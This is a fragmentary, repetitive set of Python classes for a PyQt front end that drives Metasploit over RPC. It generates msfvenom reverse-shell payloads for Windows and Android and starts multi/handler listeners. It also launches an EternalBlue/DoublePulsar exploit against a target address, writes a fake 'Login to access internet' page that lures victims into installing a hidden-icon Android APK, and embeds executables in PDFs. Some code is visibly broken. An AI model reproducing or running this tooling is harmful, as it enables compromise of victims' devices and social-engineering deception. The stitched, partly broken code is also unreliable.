def setupParam(self, data_options=None):
if data_options == None:
self.messagebox.setText(
"Critical Error: Please check the configuration of your attack"
)
self.messagebox.setWindowTitle("Critical Error!")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger(
"Critical Error: Please check the configuration of your attack",
self.LogBrowser)
self.data_options = data_options
#iterate for checking data_options
for key, value in self.data_options.items():
if self.data_options[key] == None:
self.messagebox.setText(
"Critical Error: Please check the configuration of your attack"
)
self.messagebox.setWindowTitle("Critical Error!")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger(
"Critical Error: Please check the configuration of your attack",
self.LogBrowser)
else:
pass
self.client = MsfRpcClient(
password=self.data_options['metasploit_password'],
port=self.data_options['metasploit_server_port'])
self.cid = self.client.consoles.console().cid
self.console = MsfConsole(self.client, self.cid)
def connection_rpc(self):
'''
Method used to establish a RPC Connection
:return:
'''
for i in range(0, 3):
try:
client = MsfRpcClient(
self.service_rpc_password,
port=int(self.service_rpc_port),
)
console = MsfConsole(client)
print(self.color_monitor.background_OKGREEN +
"[*] Success in login" +
self.color_monitor.background_ENDC)
# store client and console you got
self.console = console
self.client = client
break
except Exception as e:
print(
self.color_monitor.background_FAIL +
"[x] Failed to login : {}".format(str(e)),
self.color_monitor.background_ENDC)
# write a log about
text = "{} Failed to log in MSFRPC server : {}".format(
datetime.datetime.today().strftime("%d/%m/%Y %H:%M:%S"),
str(e))
# self.json_and_data_monitor.write_log(self.json_and_data_monitor.datapath + '/log_file.log',
# text)
if self.client is None:
raise Exception("Unable to connect to MSFRPC api")
def main_connection():
'''
@return: client and console if it succeeded or -1, -1 if it failed
'''
# ip = "127.0.0.1"
# user = "******"
passwd = '1234LOL'
try:
client = MsfRpcClient(passwd, port=55552)
console = MsfConsole(client)
# print(client)
except:
client = -1
console = -1
return client, console
class Attack:
def __init__(self, Browser=None, LogBrowser=None, config_handler=None):
self.Browser = Browser
self.LogBrowser = LogBrowser
self.config_handler = config_handler
self.data_options = None
self.client = None
self.console = None
self.console_read = None
self.messagebox = QMessageBox()
self.meterpreter_status = False
self.cid = None
self.default_command = ['run', 'exploit', 'rerun']
self.create_payload = """ msfvenom -p {Payload} LHOST={Host} LPORT={Port} --platform {Platform} --format {Format} --encoder {Encoder} --encrypt {Encryption} -i {Iteration} -o {Output_Directory}{Output} """
def commandlistener(self):
command = str(self.Browser.lineEdit.text())
if command == "REFRESH":
self.console.write("")
else:
self.console.write(command)
time.sleep(0.50)
QApplication.processEvents()
output = self.console.read()
if output['busy']:
self.Browser.textBrowser.append(
"<font color=white>Status: Active</font>")
self.Browser.textBrowser.append("commnad >>> %s" % command)
self.Browser.textBrowser.append(output['data'])
else:
self.Browser.textBrowser.append(
"<font color=red>Status: Inactive</font>")
self.Browser.textBrowser.append("commnad >>> %s" % command)
self.Browser.textBrowser.append(output['data'])
if command in self.default_command:
while True:
read_result = self.console.read()
read_result = read_result['data'].replace('\n', '<br>')
if read_result['busy']:
if read_result['data'] == '':
self.Browser.textBrowser.append("commnad >>> %s" %
command)
else:
self.Browser.textBrowser.append("commnad >>> %s" %
command)
self.Browser.textBrowser.append(
read_result['data'])
else:
break
if command == "KILLME":
self.Browser.textBrowser.append(
"<font color=red>[*] Please wait exiting, you can close the current tab now.....</font>"
)
self.client.consoles.destroy(self.cid)
def setupParam(self, data_options=None):
if data_options == None:
self.messagebox.setText(
"Critical Error: Please check the configuration of your attack"
)
self.messagebox.setWindowTitle("Critical Error!")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger(
"Critical Error: Please check the configuration of your attack",
self.LogBrowser)
self.data_options = data_options
#iterate for checking data_options
for key, value in self.data_options.items():
if self.data_options[key] == None:
self.messagebox.setText(
"Critical Error: Please check the configuration of your attack"
)
self.messagebox.setWindowTitle("Critical Error!")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger(
"Critical Error: Please check the configuration of your attack",
self.LogBrowser)
else:
pass
self.client = MsfRpcClient(
password=self.data_options['metasploit_password'],
port=self.data_options['metasploit_server_port'])
self.cid = self.client.consoles.console().cid
self.console = MsfConsole(self.client, self.cid)
def run(self):
self.messagebox.setText(
"This will take a few second or even minutes.\n You computer will be a little bit slow! Be patient!"
)
self.messagebox.setWindowTitle("Message")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger(
"Powershell Exploit will take a few second or even minutes",
self.LogBrowser)
process = subprocess.Popen(self.create_payload.format_map(
self.data_options),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.Browser.textBrowser.append(
"[*] Wait for a couple of seconds .....")
while process.poll() == None:
QApplication.processEvents()
self.Browser.textBrowser.append(
"[*] Creating windows malware payload Platform: {Platform}, Filename: {Output}"
.format_map(self.data_options))
self.messagebox.setText(
"The payload {Output_Directory}{Output} is created.\n you should manually move this file into /var/www/html/"
.format_map(self.data_options))
self.messagebox.exec()
self.messagebox.setText(
"The payload can be found at {Output_Directory}{Output}".
format_map(self.data_options))
self.messagebox.exec()
self.messagebox.setText("Finished Creating payload!")
self.messagebox.setWindowTitle("Message")
self.messagebox.exec()
self.Browser.textBrowser.append(
"<font color=green>[OK] Finished creating payload...</font>")
self.console.write("use exploit/multi/handler")
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("set payload {Payload}".format_map(
self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("set LHOST {Host}".format_map(self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("set LPORT {Port}".format_map(self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("exploit")
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.messagebox.setText(
"Just enter (run, rerun, exploit) command to start the listener\n and to exit the console just type (KILLME)"
)
self.messagebox.setWindowTitle("Message")
self.messagebox.exec()
class Attack:
def __init__(self, Browser=None, LogBrowser=None, config_handler=None):
self.Browser = Browser
self.LogBrowser = LogBrowser
self.config_handler = config_handler
self.data_options = None
self.client = None
self.console = None
self.console_read = None
self.messagebox = QMessageBox()
self.meterpreter_status = False
self.cid = None
self.default_command = ['run', 'exploit', 'rerun']
def commandlistener(self):
command = str(self.Browser.lineEdit.text())
if command == "REFRESH":
self.console.write("")
else:
self.console.write(command)
time.sleep(0.50)
QApplication.processEvents()
output = self.console.read()
if output['busy']:
self.Browser.textBrowser.append(
"<font color=white>Status: Active</font>")
self.Browser.textBrowser.append("commnad >>> %s" % command)
self.Browser.textBrowser.append(output['data'])
else:
self.Browser.textBrowser.append(
"<font color=red>Status: Inactive</font>")
self.Browser.textBrowser.append("commnad >>> %s" % command)
self.Browser.textBrowser.append(output['data'])
if command in self.default_command:
while True:
read_result = self.console.read()
read_result = read_result['data'].replace('\n', '<br>')
if read_result['busy']:
if read_result['data'] == '':
self.Browser.textBrowser.append("commnad >>> %s" %
command)
else:
self.Browser.textBrowser.append("commnad >>> %s" %
command)
self.Browser.textBrowser.append(
read_result['data'])
else:
break
if command == "KILLME":
self.Browser.textBrowser.append(
"<font color=red>[*] Please wait exiting, you can close the current tab now.....</font>"
)
self.client.consoles.destroy(self.cid)
def setupParam(self, data_options=None):
if data_options == None:
self.messagebox.setText(
"Critical Error: Please check the configuration of your attack"
)
self.messagebox.setWindowTitle("Critical Error!")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger(
"Critical Exploit Error: Please check the configuration of your attack",
self.LogBrowser)
self.data_options = data_options
#iterate for checking data_options
for key, value in self.data_options.items():
if self.data_options[key] == None or self.data_options[key] == "":
self.messagebox.setText(
"Critical Error: Please check the configuration of your attack"
)
self.messagebox.setWindowTitle("Critical Error!")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger(
"Critical Error: Please check the configuration of your attack",
self.LogBrowser)
else:
pass
self.client = MsfRpcClient(
password=self.data_options['metasploit_password'],
port=self.data_options['metasploit_server_port'])
self.cid = self.client.consoles.console().cid
self.console = MsfConsole(self.client, self.cid)
def run(self):
self.messagebox.setText(
"This will take a few seconds or even minutes.\n You computer will be a little bit slow! Be patient!"
)
self.messagebox.setWindowTitle("Message")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger(
"Eternalblue Doublepoulsar exploit will take a few seconds or even minutes",
self.LogBrowser)
self.console.write("use {Payload}".format_map(self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("set RHOSTS {TARGET_IP}".format_map(
self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("set RPORT {TARGET_PORT}".format_map(
self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("set VERIFY_ARCH {VERIFY_ARCH}".format_map(
self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("set VERIFY_TARGET {VERIFY_TARGET}".format_map(
self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("exploit")
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.messagebox.setText(
"Just enter (run, rerun, exploit) command to start the listener\n and to exit the console just type (KILLME)"
)
self.messagebox.setWindowTitle("Message")
self.messagebox.exec()
class Attack:
def __init__(self, Browser=None, LogBrowser=None, config_handler=None):
self.Browser = Browser
self.LogBrowser = LogBrowser
self.config_handler = config_handler
self.data_options = None
self.client = None
self.console = None
self.console_read = None
self.messagebox = QMessageBox()
self.meterpreter_status = False
self.cid = None
self.default_command = ['run', 'exploit', 'rerun']
self.create_payload = """ msfvenom -p {Payload} LHOST={Host} LPORT={Port} AndroidHideAppIcon={AndroidHideAppIcon} --platform {Platform} -i {Iteration} -o {Output_Directory}{Output} """
self.html_index = """
<!DOCTYPE HTML>
<head>
<title>Login to access internet</title>
</head>
<body>
<center>
<style>
body {
background-color: gray;
border-color: black;
border-width: 30px;
}
input {
background-color: blue;
color: white;
border-radius: 30px;
width: 60%;
height: 30%;
font-size: 260%;
}
input:hover { background-color: #6AFFA6; color: blue; }
a {
color: green;
font-size: 200%;
}
h3 {
color: white;
font-size: 200%;
}
</style>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<h3>Connect to internet by downloading the client application</h3>
<a href="ConnectDroid.apk" target="_black"><input type="button" value="Download APK"></a>
</center>
</body>
</html> """
def commandlistener(self):
command = str(self.Browser.lineEdit.text())
if command == "REFRESH":
self.console.write("")
else:
self.console.write(command)
time.sleep(0.50)
QApplication.processEvents()
output = self.console.read()
if output['busy']:
self.Browser.textBrowser.append(
"<font color=white>Status: Active</font>")
self.Browser.textBrowser.append("commnad >>> %s" % command)
self.Browser.textBrowser.append(output['data'])
else:
self.Browser.textBrowser.append(
"<font color=red>Status: Inactive</font>")
self.Browser.textBrowser.append("commnad >>> %s" % command)
self.Browser.textBrowser.append(output['data'])
if command in self.default_command:
while True:
read_result = self.console.read()
read_result = read_result['data'].replace('\n', '<br>')
if read_result['busy']:
if read_result['data'] == '':
self.Browser.textBrowser.append("commnad >>> %s" %
command)
else:
self.Browser.textBrowser.append("commnad >>> %s" %
command)
self.Browser.textBrowser.append(
read_result['data'])
else:
break
if command == "KILLME":
self.Browser.textBrowser.append(
"<font color=red>[*] Please wait exiting, you can close the current tab now.....</font>"
)
self.client.consoles.destroy(self.cid)
def setupParam(self, data_options=None):
if data_options == None:
self.messagebox.setText(
"Critical Error: Please check the configuration of your attack"
)
self.messagebox.setWindowTitle("Critical Error!")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger(
"Critical Error: Please check the configuration of your attack",
self.LogBrowser)
self.data_options = data_options
#iterate for checking data_options
for key, value in self.data_options.items():
if self.data_options[key] == None or self.data_options[key] == "":
self.messagebox.setText(
"Critical Error: Please check the configuration of your attack"
)
self.messagebox.setWindowTitle("Critical Error!")
self.config_handler.ErrorWriteLogger(
"Critical Error: Please check the configuration of your attack",
self.LogBrowser)
self.messagebox.exec()
else:
pass
self.client = MsfRpcClient(
password=self.data_options['metasploit_password'],
port=self.data_options['metasploit_server_port'])
self.cid = self.client.consoles.console().cid
self.console = MsfConsole(self.client, self.cid)
def run(self):
self.messagebox.setText(
"This will take a few seconds or even minutes.\n You computer will be a little bit slow! Be patient!"
)
self.messagebox.setWindowTitle("Message")
self.config_handler.ErrorWriteLogger(
"Android shell malware will take a few secons or even minutes",
self.LogBrowser)
self.messagebox.exec()
file = open(
str(self.data_options['Output_Directory'] +
self.data_options['html']), 'w')
file.write(self.html_index)
file.close()
process = subprocess.Popen(self.create_payload.format_map(
self.data_options),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.Browser.textBrowser.append(
"[*] Wait for a couple of seconds .....")
while process.poll() == None:
QApplication.processEvents()
self.Browser.textBrowser.append(
"[*] Creating apk android payload Arch: {Arch}, Platform: {Platform}, Filename: {Output_Directory}{Output}"
.format_map(self.data_options))
time.sleep(3)
self.messagebox.setText(
"The payload {Output_Directory}{Output} and {Output_Directory}{html} is created.\n you should manually move this file into /var/www/html/"
.format_map(self.data_options))
self.messagebox.exec()
self.messagebox.setText(
"The payload can be found at {Output_Directory}{Output}".
format_map(self.data_options))
self.messagebox.exec()
self.messagebox.setText("Finished Creating payload!")
self.messagebox.setWindowTitle("Message")
self.messagebox.exec()
self.Browser.textBrowser.append(
"<font color=green>[OK] Finished creating payload...</font>")
self.console.write("use exploit/multi/handler")
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("set payload {Payload}".format_map(
self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("set LHOST {Host}".format_map(self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("set LPORT {Port}".format_map(self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.console.write("exploit")
self.Browser.textBrowser.append(self.console.read()['data'].replace(
'\n', '<br>'))
self.messagebox.setText(
"Just enter (run, rerun, exploit) command to start the listener\n and to exit the console just type (KILLME)"
)
self.messagebox.setWindowTitle("Message")
self.messagebox.exec()
class Attack:
def __init__(self,Browser=None,LogBrowser=None,config_handler=None):
self.Browser = Browser
self.LogBrowser = LogBrowser
self.config_handler = config_handler
self.data_options = None
self.client = None
self.console = None
self.console_read = None
self.messagebox = QMessageBox()
self.meterpreter_status = False
self.cid = None
self.default_command = ['run','exploit','rerun']
def commandlistener(self):
command = str(self.Browser.lineEdit.text())
if command == "REFRESH":
self.console.write("")
else:
self.console.write(command)
time.sleep(0.50)
QApplication.processEvents()
output = self.console.read()
if output['busy']:
self.Browser.textBrowser.append("<font color=white>Status: Active</font>")
self.Browser.textBrowser.append("commnad >>> %s" % command)
self.Browser.textBrowser.append(output['data'])
else:
self.Browser.textBrowser.append("<font color=red>Status: Inactive</font>")
self.Browser.textBrowser.append("commnad >>> %s" % command)
self.Browser.textBrowser.append(output['data'])
if command in self.default_command:
while True:
read_result = self.console.read()
read_result = read_result['data'].replace('\n','<br>')
if read_result['busy']:
if read_result['data'] == '':
self.Browser.textBrowser.append("commnad >>> %s" % command)
else:
self.Browser.textBrowser.append("commnad >>> %s" % command)
self.Browser.textBrowser.append(read_result['data'])
else:
break
if command == "KILLME":
self.Browser.textBrowser.append("<font color=red>[*] Please wait exiting, you can close the current tab now.....</font>")
self.client.consoles.destroy(self.cid)
def setupParam(self,data_options=None):
if data_options == None:
self.messagebox.setText("Critical Error: Please check the configuration of your attack")
self.messagebox.setWindowTitle("Critical Error!")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger("Critical Malware Error: Please check the configuration of your attack",self.LogBrowser)
self.data_options = data_options
#iterate for checking data_options
for key, value in self.data_options.items():
if self.data_options[key] == None or self.data_options[key] == "":
self.messagebox.setText("Critical Error: Please check the configuration of your attack")
self.messagebox.setWindowTitle("Critical Error!")
self.messagebox.exec()
self.config_handler.ErrorWriteLogger("Critical Error: Please check the configuration of your attack",self.LogBrowser)
else:
pass
self.client = MsfRpcClient(password=self.data_options['metasploit_password'],port=self.data_options['metasploit_server_port'])
self.cid = self.client.consoles.console().cid
self.console = MsfConsole(self.client,self.cid)
def run(self):
self.messagebox.setText("This will take a few seconds or even minutes.\n You computer will be a little bit slow! Be patient!")
self.messagebox.setWindowTitle("Message")
self.messagebox.exec()
self.console.write("use {Payload}".format_map(self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace('\n','<br>'))
self.console.write("set EXENAME {EXE_FILE_TO_BE_EMBED}".format_map(self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace('\n','<br>'))
self.console.write("set FILENAME {OUTPUT_FILENAME_PDF}".format_map(self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace('\n','<br>'))
self.console.write("set INFILENAME {INPUT_FILENAME_PDF_FILE}".format_map(self.data_options))
self.Browser.textBrowser.append(self.console.read()['data'].replace('\n','<br>'))
self.console.write("run")
self.Browser.textBrowser.append(self.console.read()['data'].replace('\n','<br>'))
time.sleep(2)
if os.path.exists("~/.msf4/local/{OUTPUT_FILENAME_PDF}".format_map(self.data_options)):
shutil.move("~/.msf4/local/{OUTPUT_FILENAME_PDF}".format_map(self.data_options), "{OUTPUT_FILENAME_PDF}".format_map(self.data_options))
self.messagebox("The file is move to ---> {OUTPUT_FILENAME_PDF}".format_map(self.data_options))
self.messagebox.setWindowTitle("Message")
self.messagebox.exec()
else:
self.messagebox.setText("Your embedded exe fileformat is saved in:\n ~/.msf4/local/{OUTPUT_FILENAME_PDF}".format_map(self.data_options))
self.messagebox.setWindowTitle("Message")
self.messagebox.exec()